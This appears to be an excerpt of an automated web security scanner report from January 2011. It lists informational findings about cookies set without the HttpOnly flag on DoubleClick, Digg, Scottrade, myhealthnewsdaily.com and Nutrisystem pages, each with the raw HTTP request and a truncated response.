Set-Cookie: qcPageID="10.122.9.115,8002,81,Wed, 12 Jan 2011 04:09:07 UTC"; Version=1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>
...[SNIP]...

6.6. http://ad.doubleclick.net/activity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /activity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=1? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
X-Dclk-Inred-Response-Type: None
Content-Length: 43
Set-Cookie: id=c1774ac3100004e||t=1294800709|et=730|cs=c7kan7z-; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 02:51:49 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 02:51:49 GMT
Date: Wed, 12 Jan 2011 02:51:49 GMT
Server: GFE/2.0
Expires: Wed, 12 Jan 2011 02:51:49 GMT
Connection: close

GIF89a.............!.......,...........L..;

6.7. http://ad.doubleclick.net/ad/N1823.microsoft.com/B5062614.67  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N1823.microsoft.com/B5062614.67

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N1823.microsoft.com/B5062614.67;sz=1x1 HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Wed, 12 Jan 2011 02:17:15 GMT
Location: http://s0.2mdn.net/viewad/568459/10-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 02:32:15 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


6.8. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.53  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4492.MSN/B5014254.53

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N4492.MSN/B5014254.53;sz=1x1;ord=1234? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Wed, 12 Jan 2011 02:17:15 GMT
Location: http://m.doubleclick.net/dot.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 12 Jan 2011 02:32:15 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


6.9. http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click;h=v8/3a8d/4/0/%2a/b;227537752;0-0;0;50195631;4307-300/250;38347468/38365225/1;;~sscs=%3fhttp://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3298535473152&CreativeID=38347468&PlacementID=50195631&EventType=Click&rand=7398257&RedirectURL=http://www.metamucil.com/videos.php HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://aperture.displaymarketplace.com/audmeasure.gif?liveconclientID=3298535473152&CreativeID=38347468&PlacementID=50195631&EventType=Click&rand=7398257&RedirectURL=http://www.metamucil.com/videos.php
Set-Cookie: id=c1774ac3100005a||t=1294800709|et=730|cs=mbrqwyoq; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 02:51:49 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 02:51:49 GMT
Date: Wed, 12 Jan 2011 02:51:49 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


6.10. http://ad.doubleclick.net/clk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;234603142;52388354;c HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?adref=q4efficiencyMSN&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYAD:VARIOUS:N
Set-Cookie: id=c653243310000d9|737194/848412/14986|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 02:51:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


6.11. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:31:10 GMT; path=/; domain=digg.com
Set-Cookie: d=3b5b9a2fff23b5034f72836f0c1564901f30b745ea1e1762c0d50e4b67aefbde; expires=Mon, 11-Jan-2021 13:38:50 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24431 10.2.129.145
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...

6.12. http://research.scottrade.com/public/knowledgecenter/help/help.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://research.scottrade.com
Path:   /public/knowledgecenter/help/help.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /public/knowledgecenter/help/help.asp HTTP/1.1
Host: research.scottrade.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 12 Jan 2011 03:49:01 GMT
Content-Length: 42858
Content-Type: text/html
Expires: Wed, 12 Jan 2011 03:08:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1881%5F0=2ECB4E10F2C5AE24DE24978F9DEFA66F; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Help & How To |
...[SNIP]...

6.13. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/21.0.js.395x165/1294800542**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid%3DAM%7C33%7C967%7C555%7C0_@26rid%3DL%7C0_@26amvid%3D4d2cdd9abba1d HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 02:49:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2d169fde28d; expires=Sat, 12-Feb-2011 02:49:03 GMT; path=/
Set-Cookie: piba_8_21=1; expires=Sat, 12-Feb-2011 02:49:03 GMT; path=/
Set-Cookie: o=1:1; expires=Tue, 12-Apr-2011 02:49:03 GMT; path=/; domain=.wsod.com
Set-Cookie: i_8=7:21:84:0:0:36941:1294800543:L; expires=Fri, 11-Feb-2011 02:49:03 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 701

   function cmsOOB2184() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc29
...[SNIP]...

6.14. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/22.0.js.677x230/1294800545**;10,1,103;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Flp_@2Fwelcome_@2F_@3Fcid%3DAM%7C33%7C967%7C555%7C0_@26rid%3DL%7C0_@26amvid%3D4d2cdd9abba1d HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/lp/welcome/?cid=AM|33|967|555|0&rid=L|0&amvid=4d2cdd9abba1d
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d2d169fde28d; piba_8_21=1; o=1:1; i_8=7:21:84:0:0:36941:1294800543:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 12 Jan 2011 02:49:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2d169fde28d; expires=Sat, 12-Feb-2011 02:49:12 GMT; path=/
Set-Cookie: piba_8_22=1; expires=Sat, 12-Feb-2011 02:49:12 GMT; path=/
Set-Cookie: i_8=7:22:80:11:0:36941:1294800552:L|7:21:84:0:0:36941:1294800543:L; expires=Fri, 11-Feb-2011 02:49:12 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 587

   function wsod_iframeurl() {
       document.write('<iframe style="padding:0px;margin:0px;" src="http://research.scottrade.com/services/modules/smarttext/smarttext.asp?click=//scottrade.wsod.com/click/5f7e
...[SNIP]...

6.15. http://www.myhealthnewsdaily.com/10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /10-dos-and-donts-to-reduce-your-risk-of-cancer-0645/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=df6uj85m9jj3062qdfib52lkb4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:05 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40143

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.16. http://www.myhealthnewsdaily.com/college-physical-activity-decrease-101109-0709/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /college-physical-activity-decrease-101109-0709/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /college-physical-activity-decrease-101109-0709/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=fn0mr5inf24umvdvrcsfa795f4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.17. http://www.myhealthnewsdaily.com/desk-jobs-possibly-increase-weight-gain-0508/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /desk-jobs-possibly-increase-weight-gain-0508/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /desk-jobs-possibly-increase-weight-gain-0508/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=gpifi4beokchri0rpp1bsf02r5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41419

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.18. http://www.myhealthnewsdaily.com/even-youth-sports-dont-provide-enough-exercise-study-finds-0842/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /even-youth-sports-dont-provide-enough-exercise-study-finds-0842/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=u0ke7720nud5t85jtd62nkl537; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43657

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.19. http://www.myhealthnewsdaily.com/exercise-reduces-risk-some-cancer-0730/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /exercise-reduces-risk-some-cancer-0730/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /exercise-reduces-risk-some-cancer-0730/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=rpiaagbg4ort3jtgsmeikigfv3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39868

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.20. http://www.myhealthnewsdaily.com/nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nintendo-3d-games-unlikely-to-damage-childrens-eyes-0997/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=klj19u635gllrnjku81ucob880; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44927

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.21. http://www.myhealthnewsdaily.com/ten-medical-myths-0947/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-medical-myths-0947/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ten-medical-myths-0947/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=n8g8b0nm5sb1bqe1htkqd6efj2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38476

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.22. http://www.myhealthnewsdaily.com/ten-new-tips-to-eat-healthy-0992/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myhealthnewsdaily.com
Path:   /ten-new-tips-to-eat-healthy-0992/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ten-new-tips-to-eat-healthy-0992/ HTTP/1.1
Host: www.myhealthnewsdaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:06:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=l53ge59dcu77s75dh0hgdkrbg4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 12 Jan 2011 04:06:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38352

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<script type="text/javascript">
<!--
var a
...[SNIP]...

6.23. http://www.nutrisystem.com/css/hmr15/cost-calculator/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /css/hmr15/cost-calculator/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/hmr15/cost-calculator/style.css HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Referer: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=566196
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; DYN_USER_ID=242836360; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; NSOfmCookieMarker=exclude

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 02:48:28 GMT
Server: Apache
Last-Modified: Wed, 13 Oct 2010 08:35:04 GMT
ETag: "bb070c-2459-4927b7855e1e1"
Accept-Ranges: bytes
Content-Length: 9305
Content-Type: text/css
Set-Cookie: BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; path=/

#cost-calculator{color:#3b3b3b;font-size:120%;}#cost-calculator .calc-top{background:url(/images/cost-calculator/calc-top.gif) repeat-x 0 0;display:block;overflow:hidden;width:680px;height:6px;}#cost-
...[SNIP]...

6.24. http://www.nutrisystem.com/js/link_track.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /js/link_track.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/link_track.js HTTP/1.1
Host: www.nutrisystem.com
Proxy-Connection: keep-alive
Referer: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=566196
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
